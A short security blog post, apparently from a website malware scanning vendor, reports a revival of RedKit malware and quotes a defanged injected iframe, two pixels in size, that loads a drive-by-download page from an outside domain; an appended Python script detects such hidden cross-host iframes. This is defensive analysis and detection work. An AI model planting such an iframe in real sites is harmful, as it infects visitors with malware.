29 Apr, 2016

RedKit Malware Still Alive

RedKit malware is still a threat to your website’s security. Learn how Quttera can help you detect and remove malware from your site.
Back in 2013, we posted about RedKit infecting a significant number of websites. Three years later, statistics from the websites submitted to the online malware scanner show a revival of this malware among infected websites.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources (websites).

Malware entry:
< iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src="hxxp://brg-catalogues[.]com/mzcf.html?j=1886263 >

The URL in the iframe's src hosts another ~15 similar HTML pages (mzcf.html) that lead to a drive-by-download attack. Neither domain is flagged by Google, meaning that they have not yet been blacklisted:

Google report - 1
Malware clean-up
Such malware is often hidden inside a JavaScript file. If you suspect that your website has been infected by similar malware, Quttera experts are always happy to clean it for you - Malware Monitoring & Cleanup Plans For Websites
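A site owner can check their own files for the pattern shown in the malware entry above: an iframe only a couple of pixels in size whose src points at a different host. The following is an added example, not Quttera's scanner code; the function names, the 5-pixel threshold, and the sample page with its placeholder hosts are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# "<\s*iframe" also matches the "< iframe" spelling; works on HTML and on
# plain (non-obfuscated) strings inside .js files. Obfuscated loaders and
# CSS-hidden frames are out of scope for this sketch.
IFRAME_RE = re.compile(r"<\s*iframe\b([^>]*)>", re.IGNORECASE)
# name=value where value is double-quoted, single-quoted, or unquoted.
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
MAX_PIXELS = 5  # assumption: a frame this small is not meant to be seen

# Constructed sample page; hosts are placeholders, not from the article.
SAMPLE = """<html><body>
<iframe src="/widgets/news.html" width=300 height=200></iframe>
<iframe name=Twitter scrolling=auto frameborder=no height=2 width=2 src="http://ads.example.net/p.html?j=1"></iframe>
<script>document.write('<iframe src="http://cdn.example.com/x.html" width="1" height="1"></iframe>');</script>
<iframe src="https://video.example.org/embed/42" width="560" height="315"></iframe>
</body></html>"""


def parse_attrs(raw):
    return {k.lower(): v.strip("\\\"'") for k, v in ATTR_RE.findall(raw)}


def is_tiny(value):
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= MAX_PIXELS


def src_host(src):
    try:
        return (urlparse(src).hostname or "").lower()
    except ValueError:  # malformed authority, e.g. stray brackets
        return ""


def find_suspicious_iframes(text, site_host):
    """Return (line_no, host) for tiny iframes loading from another host."""
    site = site_host.lower()
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        host = src_host(attrs.get("src", ""))
        if not host or host == site or host.endswith("." + site):
            continue  # relative or same-site frame
        if is_tiny(attrs.get("width")) and is_tiny(attrs.get("height")):
            hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits


if __name__ == "__main__":
    for line_no, host in find_suspicious_iframes(SAMPLE, "shop.example.org"):
        print(f"line {line_no}: hidden iframe -> {host}")
```

Run it over every HTML, template, and JavaScript file in the web root, passing the site's own hostname, and review each reported line by hand before removing anything.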